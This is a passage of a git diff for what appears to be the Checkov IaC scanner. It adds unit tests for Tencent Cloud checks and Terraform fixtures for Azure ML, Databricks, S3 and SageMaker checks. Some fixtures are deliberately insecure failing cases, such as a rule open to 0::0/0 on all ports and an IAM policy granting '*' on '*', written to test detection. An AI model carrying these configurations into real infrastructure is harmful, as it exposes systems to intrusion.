+    ipv6_cidr_block = "0::0/0"
+    protocol        = "ALL"
+    port            = "ALL"
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/tencentcloud/test_CBSEncryption.py b/tests/terraform/checks/resource/tencentcloud/test_CBSEncryption.py
new file mode 100644
index 00000000000..b73b930ffc7
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_CBSEncryption.py
@@ -0,0 +1,38 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.CBSEncryption import check
+from checkov.terraform.runner import Runner
+
+
+class TestCBSEncryption(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_CBSEncryption"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_cbs_storage.enabled",
+        }
+        failing_resources = {
+            "tencentcloud_cbs_storage.default",
+            "tencentcloud_cbs_storage.disabled",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_CDBInternetService.py b/tests/terraform/checks/resource/tencentcloud/test_CDBInternetService.py
new file mode 100644
index 00000000000..1ed4141bcbb
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_CDBInternetService.py
@@ -0,0 +1,38 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.CDBInternetService import \
+    check
+from checkov.terraform.runner import Runner
+
+
+class TestCDBInternetService(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_CDBInternetService"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_mysql_instance.positive",
+        }
+        failing_resources = {
+            "tencentcloud_mysql_instance.negative",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_CDBIntranetPort.py b/tests/terraform/checks/resource/tencentcloud/test_CDBIntranetPort.py
new file mode 100644
index 00000000000..13aceced1c8
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_CDBIntranetPort.py
@@ -0,0 +1,38 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.CDBIntranetPort import \
+    check
+from checkov.terraform.runner import Runner
+
+
+class TestCDBIntranetPort(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_CDBIntranetPort"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_mysql_instance.positive",
+        }
+        failing_resources = {
+            "tencentcloud_mysql_instance.negative",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_CLBInstanceLog.py b/tests/terraform/checks/resource/tencentcloud/test_CLBInstanceLog.py
new file mode 100644
index 00000000000..9e77cd66f50
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_CLBInstanceLog.py
@@ -0,0 +1,37 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.CLBInstanceLog import check
+from checkov.terraform.runner import Runner
+
+
+class TestCLBInstanceLog(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_CLBInstanceLog"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_clb_instance.positive",
+        }
+        failing_resources = {
+            "tencentcloud_clb_instance.negative",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_CLBListenerProtocol.py b/tests/terraform/checks/resource/tencentcloud/test_CLBListenerProtocol.py
new file mode 100644
index 00000000000..a905e132302
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_CLBListenerProtocol.py
@@ -0,0 +1,40 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.CLBListenerProtocol import \
+    check
+from checkov.terraform.runner import Runner
+
+
+class TestCLBListenerProtocol(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_CLBListenerProtocol"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_clb_listener.positive",
+        }
+        failing_resources = {
+            "tencentcloud_clb_listener.negative1",
+            "tencentcloud_clb_listener.negative2",
+            "tencentcloud_clb_listener.negative3",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 3)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_CVMAllocatePublicIp.py b/tests/terraform/checks/resource/tencentcloud/test_CVMAllocatePublicIp.py
new file mode 100644
index 00000000000..51aa118465f
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_CVMAllocatePublicIp.py
@@ -0,0 +1,39 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.CVMAllocatePublicIp import \
+    check
+from checkov.terraform.runner import Runner
+
+
+class TestCVMAllocatePublicIp(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_CVMAllocatePublicIp"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_instance.default",
+            "tencentcloud_instance.disabled",
+        }
+        failing_resources = {
+            "tencentcloud_instance.enabled",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 2)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_CVMDisableMonitorService.py b/tests/terraform/checks/resource/tencentcloud/test_CVMDisableMonitorService.py
new file mode 100644
index 00000000000..b2c69198010
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_CVMDisableMonitorService.py
@@ -0,0 +1,39 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.CVMDisableMonitorService import \
+    check
+from checkov.terraform.runner import Runner
+
+
+class TestCVMDisableMonitorService(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_CVMDisableMonitorService"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_instance.default",
+            "tencentcloud_instance.disabled",
+        }
+        failing_resources = {
+            "tencentcloud_instance.enabled",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 2)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_CVMUseDefaultSecurityGroup.py b/tests/terraform/checks/resource/tencentcloud/test_CVMUseDefaultSecurityGroup.py
new file mode 100644
index 00000000000..e4bc6f526e7
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_CVMUseDefaultSecurityGroup.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.CVMUseDefaultSecurityGroup import \
+    check
+from checkov.terraform.runner import Runner
+
+
+class TestCVMUseDefaultSecurityGroup(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_CVMUseDefaultSecurityGroup"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_instance.default",
+            "tencentcloud_instance.orderly_security_groups_sg",
+            "tencentcloud_instance.security_groups_sg",
+        }
+        failing_resources = {
+            "tencentcloud_instance.orderly_security_groups_default",
+            "tencentcloud_instance.security_groups_default",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 3)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_CVMUseDefaultVPC.py b/tests/terraform/checks/resource/tencentcloud/test_CVMUseDefaultVPC.py
new file mode 100644
index 00000000000..8734296ea2b
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_CVMUseDefaultVPC.py
@@ -0,0 +1,41 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.CVMUseDefaultVPC import \
+    check
+from checkov.terraform.runner import Runner
+
+
+class TestCVMUseDefaultVPC(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_CVMUseDefaultVPC"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_instance.default",
+            "tencentcloud_instance.positive",
+        }
+        failing_resources = {
+            "tencentcloud_instance.negative1",
+            "tencentcloud_instance.negative2",
+            "tencentcloud_instance.negative3",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 2)
+        self.assertEqual(summary["failed"], 3)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_CVMUserData.py b/tests/terraform/checks/resource/tencentcloud/test_CVMUserData.py
new file mode 100644
index 00000000000..f39910891a1
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_CVMUserData.py
@@ -0,0 +1,40 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.CVMUserData import check
+from checkov.terraform.runner import Runner
+
+
+class TestCVMUserData(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_CVMUserData"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_instance.positive1",
+            "tencentcloud_instance.positive2",
+            "tencentcloud_instance.positive3",
+        }
+        failing_resources = {
+            "tencentcloud_instance.negative1",
+            "tencentcloud_instance.negative2",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 3)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_TKELogAgentEnable.py b/tests/terraform/checks/resource/tencentcloud/test_TKELogAgentEnable.py
new file mode 100644
index 00000000000..d3fba2fe815
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_TKELogAgentEnable.py
@@ -0,0 +1,38 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.TKELogAgentEnabled import \
+    check
+from checkov.terraform.runner import Runner
+
+
+class TestTKELogAgentEnable(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_TKELogAgentEnable"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_kubernetes_cluster.positive",
+        }
+        failing_resources = {
+            "tencentcloud_kubernetes_cluster.negative",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_TKEPublicIpAssigned.py b/tests/terraform/checks/resource/tencentcloud/test_TKEPublicIpAssigned.py
new file mode 100644
index 00000000000..54374470cc9
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_TKEPublicIpAssigned.py
@@ -0,0 +1,39 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.TKEPublicIpAssigned import \
+    check
+from checkov.terraform.runner import Runner
+
+
+class TestTKEPublicIpAssigned(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_TKEPublicIpAssigned"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_kubernetes_cluster.positive1",
+            "tencentcloud_kubernetes_cluster.positive2",
+        }
+        failing_resources = {
+            "tencentcloud_kubernetes_cluster.negative",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 2)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_VPCFlowLogConfigEnable.py b/tests/terraform/checks/resource/tencentcloud/test_VPCFlowLogConfigEnable.py
new file mode 100644
index 00000000000..74057c5ea6e
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_VPCFlowLogConfigEnable.py
@@ -0,0 +1,38 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.VPCFlowLogConfigEnable import \
+    check
+from checkov.terraform.runner import Runner
+
+
+class VPCFlowLogConfigEnable(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_VPCFlowLogConfigEnable"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_vpc_flow_log_config.positive",
+        }
+        failing_resources = {
+            "tencentcloud_vpc_flow_log_config.negative",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/checks/resource/tencentcloud/test_VPCSecurityGroupRuleSet.py b/tests/terraform/checks/resource/tencentcloud/test_VPCSecurityGroupRuleSet.py
new file mode 100644
index 00000000000..a890e7d1925
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/test_VPCSecurityGroupRuleSet.py
@@ -0,0 +1,40 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.checks.resource.tencentcloud.VPCSecurityGroupRuleSet import \
+    check
+from checkov.terraform.runner import Runner
+
+
+class VPCSecurityGroupRuleSet(unittest.TestCase):
+    def test(self):
+        test_files_dir = Path(__file__).parent / "example_VPCSecurityGroupRuleSet"
+
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        summary = report.get_summary()
+
+        passing_resources = {
+            "tencentcloud_security_group_rule_set.positive",
+        }
+        failing_resources = {
+            "tencentcloud_security_group_rule_set.negative1",
+            "tencentcloud_security_group_rule_set.negative2",
+            "tencentcloud_security_group_rule_set.negative3",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 1)
+        self.assertEqual(summary["failed"], 3)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/terraform/graph/checks/resources/AzureMLWorkspaceHBIPublicNetwork/expected.yaml b/tests/terraform/graph/checks/resources/AzureMLWorkspaceHBIPublicNetwork/expected.yaml
new file mode 100644
index 00000000000..9b5b923202b
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/AzureMLWorkspaceHBIPublicNetwork/expected.yaml
@@ -0,0 +1,6 @@
+pass:
+  - "azurerm_machine_learning_workspace.pass1"
+  - "azurerm_machine_learning_workspace.pass2"
+fail:
+  - "azurerm_machine_learning_workspace.fail1"
+  - "azurerm_machine_learning_workspace.fail2"
diff --git a/tests/terraform/graph/checks/resources/AzureMLWorkspaceHBIPublicNetwork/main.tf b/tests/terraform/graph/checks/resources/AzureMLWorkspaceHBIPublicNetwork/main.tf
new file mode 100644
index 00000000000..dbdceb92ecd
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/AzureMLWorkspaceHBIPublicNetwork/main.tf
@@ -0,0 +1,82 @@
+resource "azurerm_storage_account" "example" {
+  name                     = "example-storage"
+  resource_group_name      = "example-group"
+  location                 = "West Europe"
+  account_tier             = "Standard"
+  account_replication_type = "LRS"
+  public_network_access_enabled = true
+}
+
+resource "azurerm_storage_account" "example-default" {
+  name                     = "example-storage"
+  resource_group_name      = "example-group"
+  location                 = "West Europe"
+  account_tier             = "Standard"
+  account_replication_type = "LRS"
+}
+
+resource "azurerm_storage_account" "pass" {
+  name                     = "example-storage"
+  resource_group_name      = "example-group"
+  location                 = "West Europe"
+  account_tier             = "Standard"
+  account_replication_type = "LRS"
+  public_network_access_enabled = false
+}
+
+resource "azurerm_machine_learning_workspace" "fail1" {
+  name                    = "example-workspace2"
+  location                = "West Europe"
+  resource_group_name     = "example-rg"
+  application_insights_id = "id1"
+  key_vault_id            = "id2"
+  storage_account_id      = azurerm_storage_account.example.id
+  identity {
+    type = "SystemAssigned"
+  }
+
+  high_business_impact = true
+
+}
+resource "azurerm_machine_learning_workspace" "fail2" {
+  name                    = "example-workspace2"
+  location                = "West Europe"
+  resource_group_name     = "example-rg"
+  application_insights_id = "id1"
+  key_vault_id            = "id2"
+  storage_account_id      = azurerm_storage_account.example-default.id
+  identity {
+    type = "SystemAssigned"
+  }
+
+  high_business_impact = true
+}
+
+resource "azurerm_machine_learning_workspace" "pass1" {
+  name                    = "example-workspace2"
+  location                = "West Europe"
+  resource_group_name     = "example-rg"
+  application_insights_id = "id1"
+  key_vault_id            = "id2"
+  storage_account_id      = azurerm_storage_account.example.id
+  identity {
+    type = "SystemAssigned"
+  }
+
+  high_business_impact = false
+
+}
+
+resource "azurerm_machine_learning_workspace" "pass2" {
+  name                    = "example-workspace2"
+  location                = "West Europe"
+  resource_group_name     = "example-rg"
+  application_insights_id = "id1"
+  key_vault_id            = "id2"
+  storage_account_id      = azurerm_storage_account.pass.id
+  identity {
+    type = "SystemAssigned"
+  }
+
+  high_business_impact = true
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/checks/resources/AzureMLWorkspacePublicNetwork/expected.yaml b/tests/terraform/graph/checks/resources/AzureMLWorkspacePublicNetwork/expected.yaml
new file mode 100644
index 00000000000..36589c740b7
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/AzureMLWorkspacePublicNetwork/expected.yaml
@@ -0,0 +1,5 @@
+pass:
+  - "azurerm_machine_learning_workspace.pass1"
+  - "azurerm_machine_learning_workspace.pass2"
+fail:
+  - "azurerm_machine_learning_workspace.failed"
diff --git a/tests/terraform/graph/checks/resources/AzureMLWorkspacePublicNetwork/main.tf b/tests/terraform/graph/checks/resources/AzureMLWorkspacePublicNetwork/main.tf
new file mode 100644
index 00000000000..7296b65d2d0
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/AzureMLWorkspacePublicNetwork/main.tf
@@ -0,0 +1,40 @@
+resource "azurerm_machine_learning_workspace" "pass1" {
+  name                    = "example-workspace"
+  location                = "West Europe"
+  resource_group_name     = "example-rg"
+  application_insights_id = "id1"
+  key_vault_id            = "id2"
+  storage_account_id      = "id3"
+  identity {
+    type = "SystemAssigned"
+  }
+}
+
+resource "azurerm_machine_learning_workspace" "pass2" {
+  name                    = "example-workspace2"
+  location                = "West Europe"
+  resource_group_name     = "example-rg"
+  application_insights_id = "id1"
+  key_vault_id            = "id2"
+  storage_account_id      = "id3"
+  identity {
+    type = "SystemAssigned"
+  }
+
+  public_network_access_enabled=false
+}
+
+resource "azurerm_machine_learning_workspace" "failed" {
+  name                    = "example-workspace3"
+  location                = "West Europe"
+  resource_group_name     = "example-rg"
+  application_insights_id = "id1"
+  key_vault_id            = "id2"
+  storage_account_id      = "id3"
+  identity {
+    type = "SystemAssigned"
+  }
+
+  public_network_access_enabled = true
+}
+
diff --git a/tests/terraform/graph/checks/resources/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/expected.yaml b/tests/terraform/graph/checks/resources/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/expected.yaml
new file mode 100644
index 00000000000..4575a497b03
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/expected.yaml
@@ -0,0 +1,4 @@
+pass:
+  - "azurerm_databricks_workspace.databricks_workspace_good"
+fail:
+  - "azurerm_databricks_workspace.databricks_workspace_bad"
diff --git a/tests/terraform/graph/checks/resources/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/main.tf b/tests/terraform/graph/checks/resources/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/main.tf
new file mode 100644
index 00000000000..c77050d1717
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/main.tf
@@ -0,0 +1,22 @@
+resource "azurerm_databricks_workspace" "databricks_workspace_bad" {
+  name                        = "example"
+  location                    = "location"
+  resource_group_name         = "group"
+  sku                         = "premium"
+  managed_resource_group_name = "example"
+}
+
+
+resource "azurerm_databricks_workspace" "databricks_workspace_good" {
+  name                        = "example"
+  location                    = "location"
+  resource_group_name         = "group"
+  sku                         = "premium"
+  managed_resource_group_name = "example"
+  customer_managed_key_enabled = true
+}
+
+resource "azurerm_databricks_workspace_root_dbfs_customer_managed_key" "databricks_workspace_good" {
+  workspace_id     = azurerm_databricks_workspace.databricks_workspace_good.id
+  key_vault_key_id = "123456"
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/checks/resources/S3BucketVersioning/expected.yaml b/tests/terraform/graph/checks/resources/S3BucketVersioning/expected.yaml
index 46cf4eb4993..b8024c7f764 100644
--- a/tests/terraform/graph/checks/resources/S3BucketVersioning/expected.yaml
+++ b/tests/terraform/graph/checks/resources/S3BucketVersioning/expected.yaml
@@ -4,6 +4,8 @@ pass:
   - "aws_s3_bucket.enabled_var"
   - 'aws_s3_bucket.this["test-bucket1"]'
   - 'aws_s3_bucket.this["test-bucket2"]'
+  - "aws_s3_bucket.ref_by_name"
+  - "aws_s3_bucket.ref_by_name_local"
 fail:
   - "aws_s3_bucket.default"
   - "aws_s3_bucket.disabled"
diff --git a/tests/terraform/graph/checks/resources/S3BucketVersioning/main.tf b/tests/terraform/graph/checks/resources/S3BucketVersioning/main.tf
index ecd25029fd0..d260a076adf 100644
--- a/tests/terraform/graph/checks/resources/S3BucketVersioning/main.tf
+++ b/tests/terraform/graph/checks/resources/S3BucketVersioning/main.tf
@@ -41,6 +41,39 @@ resource "aws_s3_bucket" "legacy_syntax" {
   }
 }
 
+# Reference by name
+variable "bucket_name" {
+}
+
+resource "aws_s3_bucket" "ref_by_name" {
+  bucket = var.bucket_name
+}
+
+resource "aws_s3_bucket_versioning" "aws_bucket_versioning" {
+  bucket = var.bucket_name
+  versioning_configuration {
+    status = "Enabled"
+  }
+}
+
+variable "bucket_name_2" {
+}
+
+locals {
+  bucketName = var.bucket_name_2
+}
+
+resource "aws_s3_bucket" "ref_by_name_local" {
+  bucket = local.bucketName
+}
+
+resource "aws_s3_bucket_versioning" "aws_bucket_versioning_local" {
+  bucket = local.bucketName
+  versioning_configuration {
+    status = "Enabled"
+  }
+}
+
 # fail
 
 resource "aws_s3_bucket" "default" {
diff --git a/tests/terraform/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml b/tests/terraform/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml
new file mode 100644
index 00000000000..80608ea1c2f
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/expected.yaml
@@ -0,0 +1,5 @@
+pass:
+  - "aws_sagemaker_notebook_instance.pass1"
+  - "aws_sagemaker_notebook_instance.pass2"
+fail:
+  - "aws_sagemaker_notebook_instance.fail1"
diff --git a/tests/terraform/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/main.tf b/tests/terraform/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/main.tf
new file mode 100644
index 00000000000..1eb1049c64d
--- /dev/null
+++ b/tests/terraform/graph/checks/resources/SageMakerIAMPolicyOverlyPermissiveToAllTraffic/main.tf
@@ -0,0 +1,53 @@
+resource "aws_iam_role" "example_role" {
+  name = "example_role"
+
+  policy = jsonencode({
+    Version = "2012-10-17"
+    Statement = [
+      {
+        Effect = "Allow"
+        Action = "*"
+        Resource = "*"
+      }
+    ]
+  })
+  assume_role_policy = ""
+}
+
+resource "aws_sagemaker_notebook_instance" "fail1" {
+  name   = "example-notebook-instance"
+  role_arn = aws_iam_role.example_role.arn
+  instance_type = ""
+}
+
+resource "aws_iam_role" "example_role_restricted" {
